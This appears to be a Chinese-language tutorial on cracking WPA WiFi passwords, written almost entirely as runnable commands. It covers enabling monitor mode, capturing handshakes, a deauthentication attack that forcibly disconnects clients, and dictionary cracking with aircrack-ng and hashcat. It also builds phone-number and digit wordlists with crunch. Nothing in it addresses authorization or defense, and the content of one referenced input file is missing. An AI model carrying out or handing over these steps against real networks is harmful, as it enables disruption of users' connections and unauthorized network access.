WiFi 安全
“WiFi 安全”
参考:
airmon-ng, airodump-ng, aireplay-ng, aircrack-ng 工具的使用
Bash |
---|
| # 查看支持的网卡
airmon-ng
# 将网卡切换成监听模式
# wlan0 是网卡名称,开启后会在后面加上mon
airmon-ng start wlan0
|
Bash |
---|
| # 扫描无线列表
airodump-ng wlan0mon
# 查看指定 BSSID 的详情(非必要步骤)
airodump-ng -d 08:1F:71:xx:xx:xx wlan0mon
|
Bash |
---|
| # 抓握手包,在这里面包含加密的密码
airodump-ng -c 1 --bssid 08:1F:71:xx:xx:xx -w ~/wifi/ wlan0mon
|
Bash |
---|
| # 攻击连接上该热点的客户端,让其掉线重连,以获取握手包
# 注意:执行主动攻击的时候新建一个终端执行命令,原来的抓包终端不要结束
aireplay-ng -0 20 -a 08:1F:71:xx:xx:xx -c 04:33:85:xx:xx:xx wlan0mon
|
参数解释:
- -0
表示发起deauthentication攻击
- -a
指定无线路由器BSSID
- -c
指定强制断开的设备
Bash |
---|
| # 停止监听模式
airmon-ng stop wlan0mon
# 跑字典获取密码
aircrack-ng -a2 -b 08:1F:71:xx:xx:xx -w /usr/share/wordlists/rockyou.txt ~/wifi/*.cap
|
参数解释:
-a2
代表WPA的握手包
-b
指定要破解的wifi BSSID。
-w
指定字典文件
- 最后是抓取的包
使用 Hashcat 快速跑字典
Hashcat for windows: hashcat-5.1.0.7z hashcat-utils
Text Only |
---|
| # 转换 cap 为 hccapx
cap2hccapx.exe 01.cap 01.hccapx
# 用 Hashcat 跑字典,支持 GPU 加速,其中指定 session 可以保存日志或进度
hashcat64.exe -m 2500 D:\test\01.hccapx D:\zd\word.txt --session=whypie0
|
使用 Crunch 生成任意字典
- https://github.com/shadwork/Windows-Crunch/releases
生成手机号,新建一个 num.txt
文件,内容为:
然后让其生成,最后文件非常大,有 72.6 GB
!:
Text Only |
---|
| crunch 11 11 -f ./num.txt numeric -t 1@%%%%%%%%% -o allPhones.txt
|
- 生成8位随机数字:
crunch 8 8 0123456789 -o digits_8.txt